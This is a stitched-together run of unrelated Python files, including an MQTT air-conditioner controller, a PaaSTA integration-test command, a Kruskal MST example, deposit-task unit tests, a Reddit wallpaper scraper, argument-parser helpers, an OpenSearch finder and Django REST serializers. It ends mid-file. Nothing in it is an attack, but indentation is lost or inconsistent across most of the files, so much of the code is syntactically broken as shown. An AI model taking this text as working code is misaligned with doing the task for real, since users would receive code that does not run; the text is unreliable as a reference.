if speed == "HIGH" or speed == "MEDIUM" or speed == "LOW":
#print(self.create_config_string(id = id, fan = speed))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, fan = speed))
else :
print("Invalid fan speed. (LOW, MEDIUM, HIGH)")
def power_on(self, id):
print(self.create_config_string(id = id, power = "ON"))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, power = "ON"))
def power_off(self, id):
#print(self.create_config_string(id = id, power = "0"))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, power = "OFF"))
def set_temp(self, id, temp):
        if 16 <= temp <= 30:
print(self.create_config_string(id=id, temp=temp))
self.client.publish("Astair/MODEL/AC", self.create_config_string(id = id, temp = temp))
print("AC is set to ", temp)
else:
print("Invalid temperature value. (16-30)")
def set_mode(self, id, mode):
#print( self.create_config_string(id = id, mode = mode))
if mode == "COOL" or mode == "FAN" or mode == "DRY" or mode == "HEAT" or mode == "AUTO":
self.client.publish("Astair/MODEL/AC", self.create_config_string(id = id, mode = mode))
else:
print("Invalid mode. (COOL, FAN, DRY, HEAT, AUTO)")
def set_all(self, id, mode = "-", speed = "-", temp = "-", power = "-"):
        if mode not in ("-", "COOL", "FAN", "DRY", "HEAT", "AUTO"):
            print("Invalid mode. (COOL, FAN, DRY, HEAT, AUTO)")
        elif not (temp == "-" or 16 <= temp <= 30):
            print("Invalid temperature value. (16-30)")
        elif power not in ("-", "ON", "OFF"):
            print("Invalid power value. (ON-OFF)")
        elif speed not in ("-", "LOW", "MEDIUM", "HIGH"):
            print("Invalid fan speed. (LOW, MEDIUM, HIGH)")
else:
#print(self.create_config_string(id = id, mode = mode, fan = speed, temp = temp, power = power))
self.client.publish("Astair/MODEL/AC",self.create_config_string(id = id, mode = mode, fan = speed, temp = temp, power = power))
# def test(self):
# self.client.publish("Astair/MODEL/AC", "1,COOL,HIGH,19,OFF")
|
#!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from paasta_tools.cli.utils import get_jenkins_build_output_url
from paasta_tools.cli.utils import lazy_choices_completer
from paasta_tools.cli.utils import validate_service_name
from paasta_tools.utils import _log
from paasta_tools.utils import _run
from paasta_tools.utils import build_docker_tag
from paasta_tools.utils import check_docker_image
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import list_services
def add_subparser(subparsers):
list_parser = subparsers.add_parser(
"itest",
help="Runs 'make itest' as part of the PaaSTA contract.",
description=(
"'paasta itest' runs 'make itest' in the root of a service directory. "
"It is designed to be used in conjunction with the 'Jenkins' workflow: "
"http://paasta.readthedocs.io/en/latest/about/contract.html#jenkins-pipeline-recommended"
),
)
list_parser.add_argument(
"-s",
"--service",
help="Test and build docker image for this service. Leading "
'"services-", as included in a Jenkins job name, '
"will be stripped.",
required=True,
)
list_parser.add_argument(
"-c",
"--commit",
help="Git sha used to construct tag for built image",
required=True,
)
list_parser.add_argument(
"-d",
"--soa-dir",
dest="soa_dir",
help="A directory from which soa-configs should be read from",
default=DEFAULT_SOA_DIR,
).completer = lazy_choices_completer(list_services)
list_parser.add_argument(
"--timeout",
dest="timeout",
help="How many seconds before this command times out",
default=3600,
)
list_parser.set_defaults(command=paasta_itest)
def paasta_itest(args):
"""Build and test a docker image"""
service = args.service
soa_dir = args.soa_dir
if service and service.startswith("services-"):
service = service.split("services-", 1)[1]
validate_service_name(service, soa_dir=soa_dir)
tag = build_docker_tag(service, args.commit)
run_env = os.environ.copy()
run_env["DOCKER_TAG"] = tag
cmd = "make itest"
loglines = []
_log(
service=service,
line="starting itest for %s." % args.commit,
component="build",
level="event",
)
returncode, output = _run(
cmd,
env=run_env,
timeout=args.timeout,
log=True,
component="build",
service=service,
loglevel="debug",
)
if returncode != 0:
loglines.append("ERROR: itest failed for %s." % args.commit)
output = get_jenkins_build_output_url()
if output:
loglines.append("See output: %s" % output)
else:
loglines.append("itest passed for %s." % args.commit)
if not check_docker_image(service, args.commit):
loglines.append("ERROR: itest has not created %s" % tag)
returncode = 1
for logline in loglines:
_log(service=service, line=logline, component="build", level="event")
return returncode
|
from collections import defaultdict
## Graph Representation for edge with weight
class Graph:
def __init__(self, vertices):
self.V = vertices # No. of vertices
self.graph = [] # default dictionary
# to store graph
# function to add an edge to graph
def addEdge(self, u, v, w):
self.graph.append([u, v, w])
# A utility function to find set of an element i
# (uses path compression technique)
def find(self, parent, i):
if parent[i] == i:
return i
return self.find(parent, parent[i])
# A function that does union of two sets of x and y
# (uses union by rank)
def union(self, parent, rank, x, y):
xroot = self.find(parent, x)
yroot = self.find(parent, y)
# Attach smaller rank tree under root of
# high rank tree (Union by Rank)
if rank[xroot] < rank[yroot]:
parent[xroot] = yroot
elif rank[xroot] > rank[yroot]:
parent[yroot] = xroot
# If ranks are same, then make one as root
# and increment its rank by one
else:
parent[yroot] = xroot
rank[xroot] += 1
# Function to calculate MST using Kruskal's algorithm
def KruskalMST(self):
result = [] # This will store the resultant MST
i = 0 # An index variable, used for sorted edges
e = 0 # An index variable, used for result[]
# Step 1: Sort all the edges in non-decreasing
# order of their weight. If we are not allowed to change the
# given graph, we can create a copy of graph
self.graph = sorted(self.graph, key=lambda item: item[2])
        parent = []
        rank = []
# Create V subsets with single elements
for node in range(self.V):
parent.append(node)
rank.append(0)
# Number of edges to be taken is equal to V-1
while e < self.V - 1:
# Step 2: Pick the smallest edge and increment
# the index for next iteration
u, v, w = self.graph[i]
i = i + 1
x = self.find(parent, u)
y = self.find(parent, v)
            # If including this edge doesn't cause a cycle,
# include it in result and increment the index
# of result for next edge
if x != y:
e = e + 1
result.append([u, v, w])
self.union(parent, rank, x, y)
# Else discard the edge
return result
# Class to construct graph with result from MST and use DFS for traversal
class Graph2:
# Constructor
def __init__(self):
# default dictionary to store graph
self.graph = defaultdict(list)
# function to add an edge to graph
def addEdge(self, u, v, w):
self.graph[u].append(v)
self.graph[v].append(u)
# A function used by DFS
def DFSUtil(self, v, visited, out):
# print(out)
# Mark the current node as visited and print it
visited[v] = True
# print(v)
out.append(v)
# Recur for all the vertices adjacent to this vertex
for i in self.graph[v]:
if visited[i] == False:
self.DFSUtil(i, visited, out)
# The function to do DFS traversal. It uses
# recursive DFSUtil()
def DFS(self, v):
out = []
# Mark all the vertices as not visited
visited = [False] * (len(self.graph) + 1)
# Call the recursive helper function to print
# DFS traversal
self.DFSUtil(v, visited, out)
return out
if __name__ == '__main__':
# Construct graph with weight and compute MST
g = Graph(9)
g.addEdge(0, 1, 4)
g.addEdge(0, 7, 8)
g.addEdge(1, 2, 8)
g.addEdge(1, 7, 11)
g.addEdge(2, 3, 7)
g.addEdge(2, 8, 2)
g.addEdge(2, 5, 4)
g.addEdge(3, 4, 9)
g.addEdge(3, 5, 14)
g.addEdge(4, 5, 10)
g.addEdge(5, 6, 2)
g.addEdge(6, 7, 1)
g.addEdge(6, 8, 6)
g.addEdge(7, 8, 7)
print("Original Graph with Weight: ", g.graph)
# MST
    MST = g.KruskalMST()
print("MST: ", MST)
g2 = Graph2()
for i in MST:
g2.addEdge(i[0], i[1], i[2])
# print(g2.graph)
# print(g2.graph)
traversal = g2.DFS(2)
print("Source: 2, "+"DFS Traversal: ", traversal)
|
from octopus.modules.es.testindex import ESTestCase
from service import models
import os, shutil
from service.tests import fixtures
from redis import Redis
from octopus.core import app
from service.tasks import ethesis_deposit, purge_tasks, ethesis_poll, dataset_deposit, dataset_poll
from service import deposit
from service.lib.crud_helper import CrudHelper
from service.lib import zendesk_tickets
def mock_deposit_none(*args, **kwargs):
return None
def mock_deposit_raise(*args, **kwargs):
raise RuntimeError("An error")
def mock_create_ticket_false(*args, **kwargs):
return False
def mock_create_ticket_raise(*args, **kwargs):
raise RuntimeError("An error")
def mock_poll(*args, **kwargs):
raise RuntimeError("An error")
class TestModels(ESTestCase):
    def setUp(self):
        super(TestModels, self).setUp()
        self.old_deposit = deposit.deposit
        self.old_et_create = zendesk_tickets.ZendeskTickets.create_ethesis_ticket
        self.old_dt_create = zendesk_tickets.ZendeskTickets.create_dataset_ticket
        self.old_poll = deposit.poll
        if os.path.exists("tmp"):
            shutil.rmtree("tmp")
    def tearDown(self):
        super(TestModels, self).tearDown()
        deposit.deposit = self.old_deposit
        deposit.poll = self.old_poll
        zendesk_tickets.ZendeskTickets.create_ethesis_ticket = self.old_et_create
        zendesk_tickets.ZendeskTickets.create_dataset_ticket = self.old_dt_create
def test_01_thesis_error_none(self):
deposit.deposit = mock_deposit_none
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_deposit(r, job_id)
def test_02_thesis_error_raise(self):
deposit.deposit = mock_deposit_raise
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_deposit(r, job_id)
def test_03_thesis_purge(self):
deposit.deposit = mock_deposit_none
# get our fixtures
THESIS = fixtures.ThesisFixtureFactory.thesis()
source_file = fixtures.ThesisFixtureFactory.pdf_path()
# make an instance of the ethesis object
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
# copy in our test file
os.makedirs(et.dir)
shutil.copy(source_file, et.dir)
ch = CrudHelper("ethesis", job_id)
ch.submit_record()
pt = purge_tasks.PurgeTasks("ethesis")
pt.job(job_id)
def test_04_thesis_zendesk_error_false(self):
zendesk_tickets.ZendeskTickets.create_ethesis_ticket = mock_create_ticket_false
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_ticket(r, job_id)
def test_05_thesis_zendesk_error_raise(self):
zendesk_tickets.ZendeskTickets.create_ethesis_ticket = mock_create_ticket_raise
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_deposit._do_ticket(r, job_id)
def test_06_thesis_poll_error_raise(self):
deposit.poll = mock_poll
THESIS = fixtures.ThesisFixtureFactory.thesis()
job_id = THESIS["id"]
THESIS["edit_iri"] = "http://whatever/"
et = models.Ethesis(THESIS)
et.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
ethesis_poll._do_poll(r, job_id)
def test_07_data_error_none(self):
deposit.deposit = mock_deposit_none
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_deposit(r, job_id)
def test_08_data_error_raise(self):
deposit.deposit = mock_deposit_raise
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_deposit(r, job_id)
def test_09_data_purge(self):
deposit.deposit = mock_deposit_none
# get our fixtures
DATASET = fixtures.DatasetFixtureFactory.dataset()
source_file = fixtures.DatasetFixtureFactory.pdf_path()
        # make an instance of the dataset object
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
# copy in our test file
os.makedirs(ds.dir)
shutil.copy(source_file, ds.dir)
ch = CrudHelper("dataset", job_id)
ch.submit_record()
pt = purge_tasks.PurgeTasks("dataset")
pt.job(job_id)
def test_10_data_zendesk_error_false(self):
zendesk_tickets.ZendeskTickets.create_dataset_ticket = mock_create_ticket_false
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_ticket(r, job_id)
def test_11_data_zendesk_error_raise(self):
zendesk_tickets.ZendeskTickets.create_dataset_ticket = mock_create_ticket_raise
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_deposit._do_ticket(r, job_id)
def test_12_data_poll_error_raise(self):
deposit.poll = mock_poll
DATASET = fixtures.DatasetFixtureFactory.dataset()
job_id = DATASET["id"]
DATASET["edit_iri"] = "http://whatever/"
ds = models.Dataset(DATASET)
ds.save(blocking=True)
r = Redis(host=app.config.get('REDIS_HOST'))
dataset_poll._do_poll(r, job_id)
|
import os
import dj_database_url
from authors.settings.base import *
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG')
ALLOWED_HOSTS = config('ALLOWED_HOSTS')
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
|
class NoSuchRecord(Exception):
pass
class NoPrimaryKeyError(Exception):
pass
class DateParseFailed(Exception):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return self.msg
class InvalidExpressionError(Exception):
def __init__(self, expression: str):
self.expr = expression
def __str__(self):
return f"Invalid Expression `{self.expr}`."
class NotSupportedFilterError(Exception):
def __init__(self, filter_name: str):
self.filter_name = filter_name
def __str__(self):
return f"Filter type '{self.filter_name}' is not supported."
|
import sys
import os
import pprint
import time
import argparse
import random
from datetime import datetime
from typing import Dict, List
from io import BytesIO
import requests
import click
from selenium import webdriver
from youtube_dl import YoutubeDL
from imgur_downloader import ImgurDownloader
from PIL import Image
driver = None
this_dir = os.path.abspath(os.path.dirname(__file__))
subreddits_file = os.path.join(this_dir, "subreddits.txt")
def wait_for_internet():
    click.secho("Ensuring that there's still an internet connection...", fg='red')
    while True:
        try:
            req = requests.get("http://www.google.com", timeout=10)
            req.raise_for_status()
            return
        except requests.RequestException:
            time.sleep(1)  # back off briefly instead of hammering the endpoint
def random_wait() -> None:
"""
Waits some time between requests/clicks, display a message to the user describing wait time
"""
seconds = random.randint(2, 4)
while seconds > 0:
click.secho("\rWaiting {} second(s)...".format(seconds), nl=False, fg="yellow")
sys.stdout.flush()
seconds -= 1
time.sleep(1)
print("\r", end="")
def get_subreddits():
"""Read and parse the ./subreddits.txt file"""
if not os.path.exists(subreddits_file):
print(f"{subreddits_file} does not exist!", file=sys.stderr)
sys.exit(1)
subreddits = {}
with open(subreddits_file, "r") as subreddits_f:
for line in filter(str.strip, subreddits_f.read().splitlines()):
subreddit_name, _, pages = line.partition(" ")
try:
subreddits[subreddit_name] = int(pages)
except ValueError:
print(
f"Could not interpret {pages} as an integer, parsed from {line}. Fix that line in {subreddits_file}",
file=sys.stderr,
)
sys.exit(1)
pprint.pprint(subreddits)
return subreddits
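# The expected subreddits.txt format (inferred from the parser above): one
# subreddit per line, followed by a space and the number of pages to scrape,
# e.g.
#   wallpapers 3
#   EarthPorn 2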
def create_webdriver():
global driver
if "WALLPAPER_DRIVER" in os.environ:
driver = webdriver.Chrome(os.environ["WALLPAPER_DRIVER"])
else:
driver = webdriver.Chrome()
def configure() -> Dict[str, int]:
"""Read config file and set up chromedriver"""
subreddits = get_subreddits()
create_webdriver()
return subreddits
def get_links(subreddit_list: Dict[str, int]) -> List[str]:
"""
Use selenium to get the links for each image from each subreddit
Saves a list of links to ./links.txt
"""
global driver
assert driver is not None
driver.get("https://old.reddit.com")
# prompt the user to log in
print("Logged in accounts see 100 posts instead of 25")
input("Log into your reddit account in the chromedriver. Press enter when you're done...")
for subreddit_name in subreddit_list:
subreddit_base = f"https://old.reddit.com/r/{subreddit_name}/"
print(f"Making sure {subreddit_base} exists...")
driver.get(subreddit_base)
random_wait()
assert driver.current_url.casefold() == subreddit_base.casefold()
    # may be some links that aren't images; those can be dealt with later/handled manually
image_links = []
for subreddit_name, number_of_pages in subreddit_list.items():
# first top page, sorted by all
driver.get(f"https://old.reddit.com/r/{subreddit_name}/top/?sort=top&t=all")
pages_left = int(number_of_pages)
while pages_left > 0:
images_found = 0
for post in driver.find_elements_by_css_selector("#siteTable > div.link"):
# if this is a promoted post/advertisement
if len(post.find_elements_by_css_selector(".promoted-tag")) == 0:
image_links.append(
post.find_element_by_css_selector("a.title").get_attribute("href")
)
images_found += 1
print(f"Added {images_found} possible images from {driver.current_url}")
random_wait()
            # don't need to go to the next page when we're on the last one (1 page left)
if pages_left != 1:
# go to the next page
driver.find_element_by_css_selector("span.next-button").click()
pages_left -= 1
driver.quit()
with open(os.path.join(this_dir, "links.txt"), "w") as link_cache:
link_cache.write("\n".join(image_links))
return image_links
def download_images(image_links: List[str]):
os.makedirs(os.path.join(this_dir, "wallpapers"), exist_ok=True)
couldnt_download = open(os.path.join(this_dir, "failed.txt"), "a")
ydl = YoutubeDL({"outtmpl": "./wallpapers/%(title)s.%(ext)s"})
def_headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
for i, url in enumerate(image_links, 1):
click.secho(
f"({i}/{len(image_links)}) Trying to download: '{url}'...", fg="blue"
)
if "old.reddit.com" in url:
try:
# youtube-dl can download reddit videos
# it will fallback to parsing the page/downloading the content anyways
# so this works for any images which are not direct links to the image
ydl.download([url])
click.secho("Download succeeded!", fg="green")
random_wait()
except:
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
elif "imgur" in url:
try:
# this may fail if a URL not on imgur has imgur in the url, but I'm fine ignoring that
# case and going through the URL manually after its written to failed.txt
ImgurDownloader(
url,
dir_download=os.path.join(this_dir, "wallpapers"),
debug=True,
delete_dne=False,
).save_images()
click.secho("Download succeeded!", fg="green")
random_wait()
except Exception as e:
print(str(e))
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
else:
try:
r = requests.get(url, stream=True, headers=def_headers)
try:
Image.open(BytesIO(r.content)).save(
"./wallpapers/{}.png".format(datetime.now())
)
click.secho("Download succeeded!", fg="green")
except OSError as oe: # image failed to be parsed
click.echo(str(oe))
raise oe # re-raise so that the failed image decode gets written to failed.txt
random_wait()
except:
click.secho(f"Couldn't download '{url}'.", fg="red", err=True)
couldnt_download.write(f"{url}\n")
couldnt_download.flush()
wait_for_internet()
couldnt_download.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--use-links", help="use the links.txt instead of using selenium to generate new links", action="store_true", default=False, required=False)
args = parser.parse_args()
try:
if args.use_links:
with open('links.txt', 'r') as f:
links = list(map(str.strip, f.read().splitlines()))
else:
links = get_links(configure())
download_images(links)
finally:
if driver:
driver.quit()
|
from pathlib import Path
def homedirectory():
    # Path().resolve() returns the current working directory, not the home
    # directory the function name promises; Path.home() is the correct call.
    home = Path.home()
    return home
home=homedirectory()
|
import os
import types
import functools
import configargparse
def path(x):
return str(x)
class ArgParser(configargparse.ArgParser):
@classmethod
def attach_methods(cls, target):
        target.a = types.MethodType(cls.a, target)
        target.g = types.MethodType(cls.g, target)
        target.add_group = types.MethodType(cls.add_group, target)
        target.add_mutex_group = types.MethodType(cls.add_mutex_group, target)
        target.add_mutex_switch = types.MethodType(cls.add_mutex_switch, target)
return target
def __init__(self, *args, allow_config=False, config_path_base=True,
**kwargs):
super(ArgParser, self).__init__(*args, fromfile_prefix_chars="@",
**kwargs)
self.a = types.MethodType(
functools.update_wrapper(ArgParser.a, ArgParser.add),
self)
self.g = types.MethodType(
functools.update_wrapper(ArgParser.g, ArgParser.add_argument_group),
self)
self.add_group = types.MethodType(
functools.update_wrapper(ArgParser.add_group,
ArgParser.add_argument_group),
self)
self.add_mutex_group = types.MethodType(
functools.update_wrapper(ArgParser.add_mutex_group,
ArgParser.add_mutually_exclusive_group),
self)
self.config_path_base = config_path_base
if allow_config:
self.add("--config", is_config_file=True)
def a(self, *args, **kwargs):
return self.add(*args, **kwargs)
def g(self, *args, **kwargs):
return self.add_group(*args, **kwargs)
def add_group(self, *args, **kwargs):
return self.add_argument_group(*args, **kwargs)
def add_argument_group(self, *args, **kwargs):
group = super(ArgParser, self).add_argument_group(*args, **kwargs)
group = self.attach_methods(group)
return group
def add_mutex_group(self):
return self.add_mutually_exclusive_group()
def add_mutex_switch(parser, dest, arguments=set(), default=None,
single_arg=False, required=False):
"""Adds mutually exclusive switch arguments.
Args:
arguments: a dictionary that maps switch name to helper text. Use
sets to skip help texts.
"""
if default is not None:
assert default in arguments
if isinstance(arguments, set):
arguments = {k: None for k in arguments}
if not single_arg:
mg = parser.add_mutually_exclusive_group(required=required)
for name, help_text in arguments.items():
kwargs = {
"action": "store_const",
"dest": dest,
"const": name,
"help": help_text
}
if default == name:
kwargs["default"] = name
mg.add_argument("--{}".format(name), **kwargs)
return mg
else:
kwargs = {
"dest": dest,
"type": str,
"default": default,
"help": "\n".join("{}: {}".format(k, v)
for k, v in arguments.items()),
"choices": list(arguments.keys())
}
return parser.add_argument("--{}".format(dest), **kwargs)
def _resolve_relative_path(self, args, base_path):
for action in self._actions:
if action.type != path:
continue
dest = action.dest
arg_val = getattr(args, dest, None)
if arg_val is None:
continue
def _resolve(path):
if not os.path.isabs(path):
return os.path.join(base_path, path)
return path
if isinstance(arg_val, list):
new_val = [_resolve(v) for v in arg_val]
else:
new_val = _resolve(arg_val)
setattr(args, dest, new_val)
def parse_args(self, *parsed_args, **kwargs):
parsed_args = super(ArgParser, self).parse_args(*parsed_args, **kwargs)
if hasattr(parsed_args, "config") and parsed_args.config is not None \
and self.config_path_base:
config_path = os.path.abspath(parsed_args.config)
work_path = os.path.dirname(config_path)
else:
work_path = os.getcwd()
self._resolve_relative_path(parsed_args, work_path)
return parsed_args
    def __str__(self):
        return "\n".join("{}: {}".format(k, v) for k, v in vars(self).items())
|
# Copyright 2018 Alex K (wtwf.com) All rights reserved.
"""
Find the search url (and the suggest url) for a site
gold standard (even if it's php and downloads the file)
http://www.gutenberg.org/
http://www.gutenberg.org/w/opensearch_desc.php
http://www.gutenberg.org/w/api.php?action=opensearch&search=arctic&namespace=0|4
also should support ld+json (doesn't seem to have suggest support)
https://developers.google.com/search/docs/data-types/sitelinks-searchbox
https://www.chewy.com/
other sites:
https://www.costco.com/
https://www.airbnb.com/opensearch.xml
https://www.crunchbase.com/opensearch.xml?version=2
https://www.labnol.org/
https://www.diigo.com/search/open_search
https://community.dremio.com/
https://domains.google/#/
https://earlyretirementnow.com/osd.xml
https://www.flickr.com/opensearch.xml
"""
__author__ = 'wtwf.com (Alex K)'
import json
import logging
import re
import urlparse
import HTMLParser
import xml.etree.ElementTree
import google.appengine.api.urlfetch
from wtwf import wtwfhandler
class FindHrefParser(HTMLParser.HTMLParser):
def reset(self):
HTMLParser.HTMLParser.reset(self)
self.hrefs = []
    def handle_starttag(self, tag, attrs):
        # HTMLParser passes attrs as a list of (name, value) tuples.
        attrs = dict(attrs)
        if 'href' in attrs:
            self.hrefs.append(attrs['href'])
class FindOpensearchHandler(wtwfhandler.WtwfHandler):
def get(self):
url = self.request.get('url')
base = urlparse.urljoin(url, '/')
res = google.appengine.api.urlfetch.fetch(base)
content = res.content
# first try and find opensearch
opensearch_url = getOpenSearchUrl(res.content)
if opensearch_url:
res = google.appengine.api.urlfetch.fetch(urlparse.urljoin(base, opensearch_url))
search_and_suggest = getSearchAndSuggestFromOpenSearchXml(res.content)
# second try and find ld+json
def getOpenSearchUrl(page):
opensearch_re = re.compile(r'<[^>]*opensearchdescription\+xml[^>]*>')
match = opensearch_re.search(page)
if match:
parser = FindHrefParser()
parser.feed(match.group(0))
if len(parser.hrefs) > 0:
return parser.hrefs[0]
def getSearchAndSuggestFromOpenSearchXml(xml_text):
    # NB: the parameter must not be named `xml`, or it would shadow the module.
    root = xml.etree.ElementTree.fromstring(xml_text)
    search = None
    suggest = None
    # Get the Url elements (namespaced in OpenSearch 1.1 documents)
    urls = root.findall('{http://a9.com/-/spec/opensearch/1.1/}Url') or root.findall('Url')
    for url_el in urls:
        template = url_el.get('template', '')
        mime_type = url_el.get('type', '')
        # if it's text/html it's the search url: take the template and turn
        # {searchTerms} into %s (ElementTree already unescapes &amp;)
        if mime_type == 'text/html' and search is None:
            search = template.replace('{searchTerms}', '%s')
        # if it's application/x-suggestions+json then it's the suggest url
        # (if it only has application/x-suggestions+xml then that's messed up)
        elif mime_type == 'application/x-suggestions+json' and suggest is None:
            suggest = template.replace('{searchTerms}', '%s')
    if search or suggest:
        return {'search': search, 'suggest': suggest}
|
from rest_framework import viewsets, permissions
from languages.models import Paradigm
from languages.serializers import ParadigmSerializer
class ParadigmView(viewsets.ModelViewSet):
queryset = Paradigm.objects.all()
serializer_class = ParadigmSerializer
|
import logging
from .utils import importer
logger = logging.getLogger(__name__)
class Storage(object):
"""
Offers a standard set of methods and I/O on persistent data.
"""
def __init__(self, conf_dict=None):
pass
    def get(self, k, default=None):
        raise NotImplementedError()
    def update(self, ava):
        raise NotImplementedError()
    def delete(self, k, v):
        raise NotImplementedError()
    def __getitem__(self, k):
        raise NotImplementedError()
    def __setitem__(self, k, v):
        raise NotImplementedError()
    def __delitem__(self, v):
        raise NotImplementedError()
    def __call__(self):
        raise NotImplementedError()
    def __len__(self):
        raise NotImplementedError()
    def __contains__(self, k):
        raise NotImplementedError()
    def __iter__(self):
        raise NotImplementedError()
    def synch(self):
        raise NotImplementedError()
    def keys(self):
        raise NotImplementedError()
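# Hedged sketch (not part of the original module): a minimal in-memory
# implementation of the Storage interface above, handy for tests.
class DictStorage(Storage):
    def __init__(self, conf_dict=None):
        super(DictStorage, self).__init__(conf_dict)
        self._db = {}
    def get(self, k, default=None):
        return self._db.get(k, default)
    def update(self, ava):
        self._db.update(ava)
    def __getitem__(self, k):
        return self._db[k]
    def __setitem__(self, k, v):
        self._db[k] = v
    def __delitem__(self, k):
        del self._db[k]
    def __len__(self):
        return len(self._db)
    def __contains__(self, k):
        return k in self._db
    def __iter__(self):
        return iter(self._db)
    def keys(self):
        return self._db.keys()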
|
# Copyright (C) 2019 Verizon. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from rest_framework import serializers
from catalog.packages.const import NSDM_NOTIFICATION_TYPES
class NsdmNotificationsFilter(serializers.Serializer):
notificationTypes = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=NSDM_NOTIFICATION_TYPES
),
help_text="Match particular notification types",
allow_null=False,
required=False
)
nsdInfoId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS packages with particular nsdInfoIds",
allow_null=False,
required=False
)
nsdId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdIds",
allow_null=False,
required=False
)
nsdName = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match NS Packages with particular nsdNames",
allow_null=False,
required=False
)
nsdVersion = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="match NS packages that belong to certain nsdversion",
required=False,
allow_null=False
)
nsdInvariantId = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdInvariantIds",
allow_null=False,
required=False
)
vnfPkgIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages that has VNF PackageIds",
allow_null=False,
required=False
)
nestedNsdInfoIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match NS Packages with particular nsdInvariantIds",
allow_null=False,
required=False
)
nsdOnboardingState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=[
'CREATED',
'UPLOADING',
'PROCESSING',
'ONBOARDED'
]
),
help_text="Match NS Packages with particular NS Onboarding State",
allow_null=False,
required=False
)
nsdOperationalState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['ENABLED', 'DISABLED']
),
help_text="Match NS Packages with particular NS Operational State",
allow_null=False,
required=False
)
nsdUsageState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
choices=['IN_USE', 'NOT_IN_USE']
),
help_text="Match NS Packages with particular NS Usage State",
allow_null=False,
required=False
)
pnfdInfoIds = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF packages with particular pnfdInfoIds",
allow_null=False,
required=False
)
pnfdId = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF packages with particular pnfdInfoIds",
allow_null=False,
required=False
)
pnfdName = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match PF Packages with particular pnfdNames",
allow_null=False,
required=False
)
pnfdVersion = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="match PF packages that belong to certain pnfd version",
required=False,
allow_null=False
)
pnfdProvider = serializers.ListField(
child=serializers.CharField(
max_length=255,
required=True
),
help_text="Match PF Packages with particular pnfdProvider",
allow_null=False,
required=False
)
pnfdInvariantId = serializers.ListField(
child=serializers.CharField(),
help_text="Match PF Packages with particular pnfdInvariantIds",
allow_null=False,
required=False
)
pnfdOnboardingState = serializers.ListField(
child=serializers.ChoiceField(
required=True,
